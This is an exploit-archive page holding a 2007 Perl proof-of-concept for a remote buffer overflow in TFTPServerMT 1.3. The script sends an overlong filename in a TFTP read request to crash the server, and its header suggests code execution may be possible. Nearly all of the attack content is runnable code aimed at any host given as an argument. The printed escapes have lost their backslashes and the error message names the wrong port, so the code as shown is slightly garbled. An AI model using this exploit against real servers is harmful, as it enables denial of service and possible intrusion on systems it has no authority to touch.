TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TFTP Server 1.3 Remote Buffer Overflow Denial of Service Exploit
# Published : 2007-03-12
# Author : Umesh Wanve
# Previous Title : Avant Browser <= 11.0 build 26 Remote Stack Overflow Crash Exploit
# Next Title : News Bin Pro 4.32 Article Grabbing Remote Unicode BoF Exploit

#################################################################################################################
#    Name : TFTPServerMT v 1.3 Remote Buffer Overflow Dos Exploit
#  
#   Author: Umesh Wanve
#
#     Date: 01-03-2007
#
#   Desc: This is latest version of TFTP server. EDI gets overwritten at 246. So code execution may be possible
#         Someone can better write it. Sending a long file name on the vulnerable server can crash the server.
#
#   Details: http://sourceforge.net/project/showfiles.php?group_id=162512
#
###############################################################################################################
#!/usr/bin/perl

use IO::Socket;
#use strict;

 
my($read_request)="x00x01";                                                # GET or PUT request

my($tailer)="x00x6ex65x74x61x73x63x69x69x00";                      #transporting mode (eg. netascii)   

my($pad)="x90" x 279;                                



if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto    => "UDP"))
{
                

                 print $socket "x00x01".("A"x242)."BBBB".$tailer;

                 sleep(1);
            
               
                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:23n";
}
# __END_CODE 

# www.Syue.com [2007-03-12]